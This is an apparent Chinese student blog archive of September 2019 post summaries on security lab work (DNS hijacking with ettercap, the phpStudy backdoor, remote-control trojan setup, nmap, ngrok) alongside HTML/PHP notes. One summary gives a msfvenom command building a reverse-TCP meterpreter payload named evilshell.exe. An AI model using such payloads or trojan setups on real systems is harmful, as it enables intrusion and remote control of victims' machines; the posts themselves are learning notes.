/* 看板娘 */ /* 粒子吸附*/

09 2019 档案

摘要:Dns劫持 Kali当作攻击者,server2008 r2当作被攻击者 互ping能通 Step1:在攻击者的电脑中搭建web服务 开启apache 在/var/www下创建index.html Step2:在终端打开ettercap的dns文件,在/etc/ettercap/etter.dns 在 阅读全文
posted @ 2019-09-29 08:52 砂岩boy 阅读(200) 评论(0) 推荐(0) 编辑
摘要:前段时间phpstudy被人发现某些版本存在后门,许多人就这样被当作肉鸡长达两年之久 后门隐藏在程序自带的php的php_xmlrpc.dll模块 影响的版本:phpstudy2016和2018 在H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找 阅读全文
posted @ 2019-09-29 00:03 砂岩boy 阅读(3512) 评论(0) 推荐(0) 编辑
摘要:控制端:运行在攻击者的电脑中,负责控制其他肉鸡 被控制端:需要生成,与你行在肉鸡上,木马病毒 两端需要数据互通 打开远见,在系统设置里修改密码后重启 然后打开hfs 右键,选择添加文件,将consys21.dll文件添加进来,然后右键该文件,选择复制url 先浏览器打开看一下能否访问 在远见中点击服 阅读全文
posted @ 2019-09-28 12:30 砂岩boy 阅读(284) 评论(0) 推荐(0) 编辑
摘要:基本语法规范1、<?php 开头?>结尾2、php可以单独存在,也可以和html等结合使用3、后缀名一般以.php结尾4、php配置环境一般为php.ini 开发php的环境准备1、 phpstudy v8版本2、 安装 sublime text3、notepad++、vs code、phpstor 阅读全文
posted @ 2019-09-28 08:11 砂岩boy 阅读(216) 评论(0) 推荐(0) 编辑
摘要:Nmap最早是linux中扫描和嗅探工具,网络连接扫描工具,主要探测主机是否存活(是否开机),开启服务(扫端口)、安全性问题(高级用法)、系统类型(os类型) 本次作业是在kali中使用nmap去赛秒服务器,着重注意web、ssh、postgesql、mysql、samba、vsftp等服务的扫描结 阅读全文
posted @ 2019-09-27 13:29 砂岩boy 阅读(452) 评论(0) 推荐(0) 编辑
摘要:Ngrok,简单来说就是提供一个安全的隧道来实现内网资源的映射 访问http://www.ngrok.cc/login.html,注册并购买免费的服务器 之后选择linux64下载到kali里 在解压文件目录下使用.sunny命令进行安装 运行如下命令搭建通道 在宿主机中输入隧道管理中赠送的域名,显 阅读全文
posted @ 2019-09-25 11:48 砂岩boy 阅读(1) 评论(0) 推荐(0) 编辑
摘要:HTML元素分为:块级元素和内联元素 块级元素:标签元素会以新行开始或结束。【<h1><p><table>当前元素标签要独占一行】 内联元素:显示数据不会以新行开始。【<a><img><td>会堆积在一起】 页面布局时需要考虑整体美观可欣赏性,从而进行详尽的设计。优秀的页面布局可以很好的吸引人的目光 阅读全文
posted @ 2019-09-24 08:26 砂岩boy 阅读(347) 评论(0) 推荐(0) 编辑
摘要:首先是搭建wordpress 需要有php环境,建议官网下载phpstudy v8 安装完成启动phpstudy后,在mysql里创建一个新的数据库命名为wordpress,密码自己定 在wordpress官网下载压缩包,解压后的文件放在用PHP study搭建的网站根目录下 然后在浏览器访问loc 阅读全文
posted @ 2019-09-23 23:52 砂岩boy 阅读(468) 评论(0) 推荐(0) 编辑
摘要:MSF渗透工具是基于msfconsole数据库的,使用前需要先打开数据库 通过msfvenom -p windows/metepreter/reverse_tcp lhost=kali's ip lport=5555 exe > ./root/desktop/evilshell.exe 因为权限很麻 阅读全文
posted @ 2019-09-23 08:13 砂岩boy 阅读(422) 评论(0) 推荐(0) 编辑
摘要:HTML是超文本标记语言,注意,不是编程语言。 有双标签<body></body>,但标签<img src=#/>两种 可以通过浏览器查看HTML代码,<body/>标签中的数据会显示出来 编辑html代码的编译器可以用VS code、sublime、notepad++; 常用标签: 一、标题<h1 阅读全文
posted @ 2019-09-19 22:12 砂岩boy 阅读(199) 评论(0) 推荐(0) 编辑
摘要:全球共有十三类根域。 一个完整的域名,类似于ftp.ichunqiu.com,com是顶级域名,ichunqiu是二级域名,ftp是主机名 DNS分为正向查询和反向查询,正向查询又分为递归查询和迭代查询 DNS的资源类型为 下面在基于windows server 2008进行dns的安装和使用 在管 阅读全文
posted @ 2019-09-19 22:08 砂岩boy 阅读(839) 评论(0) 推荐(0) 编辑
摘要:拜这电脑所赐,完美慢上课进度一个节点,我太难了。 来看看今天遇到的问题吧。首先是ubuntu安装php环境,再安装phpmyadmin。讲道理我php安装很顺利,并没有出什么问题,php -v后查看版本应该也是没有问题的,和其他人相同。 但为什么安装phpmyadmin的时候就会遇到问题呢? 查看问 阅读全文
posted @ 2019-09-17 18:17 砂岩boy 阅读(124) 评论(0) 推荐(0) 编辑
摘要:终于能用校园网了,赶紧给kali更新源。 期间遇到了好几个问题导致无法成功,我自己还不明所以,上网查了之后发现问题可能出现在一下几个方面: 1、sources.list.d目录下有错误的库存在。删掉后未解决; 2、更新命令打错了。仔细检查并未出错,分开一一尝试也未出错,排除; 3、防火墙未关闭。我查 阅读全文
posted @ 2019-09-16 13:02 砂岩boy 阅读(843) 评论(0) 推荐(0) 编辑
摘要:唔,今天要看电工和安卓,还得去图书馆借书。 加油。 阅读全文
posted @ 2019-09-15 10:45 砂岩boy 阅读(80) 评论(0) 推荐(0) 编辑
摘要:过节还是比较松懈的。 今儿个抽空给之前的命令又操作了一边,就算巩固了吧。 阅读全文
posted @ 2019-09-14 18:49 砂岩boy 阅读(102) 评论(0) 推荐(0) 编辑
摘要:之前有接触过一点网络安全法的知识,当然忘的差不多了。 以后也不知道会不会从事相关工作,但多了解一点总归是好的,尤其是听说部分网络安全工作者游走于灰色的边界线,还是挺担心的。 三十七分钟的视频,讲道理这人念稿子都磕碜,不太用心啊 阅读全文
posted @ 2019-09-13 23:20 砂岩boy 阅读(75) 评论(0) 推荐(0) 编辑
摘要:之前没接触过linux的相关安全知识,今天要从头开始学习了。 linux更多的是命令操作,对习惯了windows的用户来说属实有点别扭。今儿个见识到了linux的各种权限操作,r、w、x的设置从一开始就让人感觉到linux对权限设置的严谨,相比下window未必差了多少,但是没有这种直观的体验。 l 阅读全文
posted @ 2019-09-12 23:35 砂岩boy 阅读(93) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示